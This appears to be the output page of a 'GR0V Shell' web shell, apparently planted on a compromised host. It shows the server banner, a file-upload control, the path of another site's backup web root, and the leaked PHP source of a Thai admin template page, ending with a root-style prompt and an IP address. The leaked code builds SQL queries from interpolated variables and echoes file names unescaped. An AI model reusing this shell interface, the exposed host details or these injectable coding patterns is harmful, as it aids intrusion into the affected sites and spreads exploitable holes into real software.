? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/public_html_bk/promice/Admin/
File Upload :
Current File : /home/admin/domains/happytokorea.com/public_html_bk/promice/Admin/Template.php

<?
@session_start();
ob_start();
$useradmin = $_SESSION["useradmin"];
if(empty($useradmin)) 
{
echo "<script>alert('หน้านี้จำกัดเฉพาะ Admin เท่านั้น');history.back();</script>";
exit();
}
require_once "../include/tdate.php";
require_once "../include/connect.php";
require_once "../include/connectdb.php";

						  $sql="select * from useradmin where useradmin='$useradmin'";
						  $db_query=mysql_db_query($db,$sql);
						  $result=mysql_fetch_array($db_query);
						  $id=$result[id];
						  $adminname=$result[name];
						  $user_admin=$result[useradmin];
						  $pass_admin=$result[passadmin];

$date1 = "$_POST[yy1]-$_POST[mm1]-$_POST[dd1]";
$date2 = "$_POST[yy2]-$_POST[mm2]-$_POST[dd2]";
$date_1 = date($date1);
$date_2 = date($date2);
?>
<html>
<head>
<title><? echo "$headtxt"; ?></title>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<!-- Fireworks MX Dreamweaver MX target.  Created Sat Apr 02 10:29:23 GMT+0700 (SE Asia Standard Time) 2011-->
<link href="../css/style.css" rel="stylesheet" type="text/css">
</head>
<body bgcolor="#ffffff">
<div align="center"><strong> 
  </strong>
  <table width="89%" border="0" align="center" cellpadding="1" cellspacing="1">
    <tr valign="top"> 
      <td width="57%"><? echo "$headtxt | $e_date $etime"; ?><br>
        <div align="left">หน้าปัจจุบันของคุณ : 
          <a href="Main.php">หน้าหลัก</a> --&gt; 
          <strong>จัดการ Template</strong></div></td>
      <td width="43%"> <div align="right">ยินดีต้อนรับคุณ 
          <? echo "<u>$adminname</u>"; ?> เข้าใช้งานในระบบ<br>
          [ <a href="ChangePass.php">เปลี่ยนรหัสผ่าน</a> 
          ] <a href="logout.php">ออกจากระบบ</a> </div></td>
    </tr>
    <tr> 
      <td colspan="2"><table width="100%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#E9E9E6">
          <tr> 
            <td><div align="center"> 
                <table width="100%" border="0" cellspacing="1" cellpadding="1">
                  <tr> 
                    <td><div align="center"><br>
                        <table width="100%" border="0" cellspacing="1" cellpadding="1">
                          <tr> 
                            <td><div align="center"><br>
                                 
                                <?php
						  $sql_temp="select * from template where id = 1";
						  $db_query=mysql_db_query($db,$sql_temp);
						  $result1=mysql_fetch_array($db_query);
						  $idc  =$result1['id'];
						  $headtemp  =$result1['headtemp'];
						  $buttomtemp  =$result1['buttomtemp'];
						?>
                                 
                                <table width="100%" border="0" cellspacing="1" cellpadding="1">
                                  <tr> 
                                    <td><div align="left"> 
                                        <table width="21%" border="0" cellspacing="1" cellpadding="1">
                                          <tr> 
                                            <td bgcolor="#333333"><strong>ส่วนหัวเว็บ 
                                              (Head Template)</strong></td>
                                          </tr>
                                        </table>
                                      </div></td>
                                  </tr>
                                  <tr> 
                                    <td><div align="center"> 
                                        <?
							if ($headtemp != "")
							{
							echo "<img src=../Templates/$headtemp border=0><br><img src=../images/delete.png border=0> <a href=DelTemplate.php?ID=1&TempField=headtemp&TempPic=$headtemp>ลบภาพ!</a>";
							}else{
							echo "ยังไม่มีภาพส่วนหัวเว็บ";
							}
							?>
                                      </div></td>
                                  </tr>
                                  <tr> 
                                    <td><table width="21%" border="0" cellspacing="1" cellpadding="1">
                                        <tr> 
                                          <td bgcolor="#333333"><strong>ส่วนท้ายเว็บ 
                                            (Buttom Template)</strong></td>
                                        </tr>
                                      </table></td>
                                  </tr>
                                  <tr> 
                                    <td><div align="center"> 
                                        <?
							if ($buttomtemp != "")
							{
							echo "<img src=../Templates/$buttomtemp border=0><br><img src=../images/delete.png border=0> <a href=DelTemplate.php?ID=1&TempField=buttomtemp&TempPic=$buttomtemp>ลบภาพ!</a>";
							}else{
							echo "ยังไม่มีภาพส่วนท้ายเว็บ";
							}
							?>
                                      </div></td>
                                  </tr>
                                  <tr> 
                                    <td>&nbsp;</td>
                                  </tr>
                                </table>
                                <u>หมายเหตุ</u> 
                                : ต้องการเปลี่ยนรูป 
                                Template จำเป็นที่ต้องลบภาพก่อน!<br>
                                <table width="75%" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#E9E9E6">
                                  <tr> 
                                    <td> <div align="center">
                                        <table width="100%" border="0" cellspacing="1" cellpadding="1">
                                        <form method="post" action="TemplateSave.php" enctype="multipart/form-data">  <tr> 
                                            <td width="16%"> <div align="right">ส่วนหัวเว็บ 
                                                :</div></td>
                                            <td width="84%">
											<?
											if ($headtemp != "")
											{
											echo "<input type = file size=45 name=headtempnew class=input disabled><input type=hidden name=headtempold value=$headtemp>";
											}else{
											echo "<input type = file size=45 name=headtempnew class=input>";
											}
											?>
											 
                                              ** ขนาดไม่เกิน 1000x200 pixels **</td>
                                          </tr>
                                          <tr> 
                                            <td><div align="right">ส่วนท้ายเว็บ 
                                                :</div></td>
                                              <td> 
                                                <?
											if ($buttomtemp != "")
											{
											echo "<input type = file size=45 name=buttomtempnew class=input disabled><input type=hidden name=buttomtempold value=$buttomtemp>";
											}else{
											echo "<input type = file size=45 name=buttomtempnew class=input>";
											}
											?>
                                                 
                                                ** ขนาดไม่เกิน 1000x75 pixels 
                                                ** </td>
                                          </tr>
                                          <tr>
                                            <td>&nbsp;</td>
                                            <td><input name="submit" type=submit class=submit value=แก้ไขรายการ></td>
                                          </tr></form>
                                        </table>
                                      </div></td>
                                  </tr>
                                </table>
                                
                              </div></td>
                          </tr>
                        </table>
                        <br>
                        <br>
                      </div></td>
                  </tr>
                </table>
              </div></td>
          </tr>
        </table></td>
    </tr>
    <tr> 
      <td colspan="2"><div align="center"><br>
          <? echo "$buttomtxt"; ?> </div></td>
    </tr>
  </table>
  
</div>
</body>
</html>

T1KUS90T
  root-grov@210.1.60.28:~$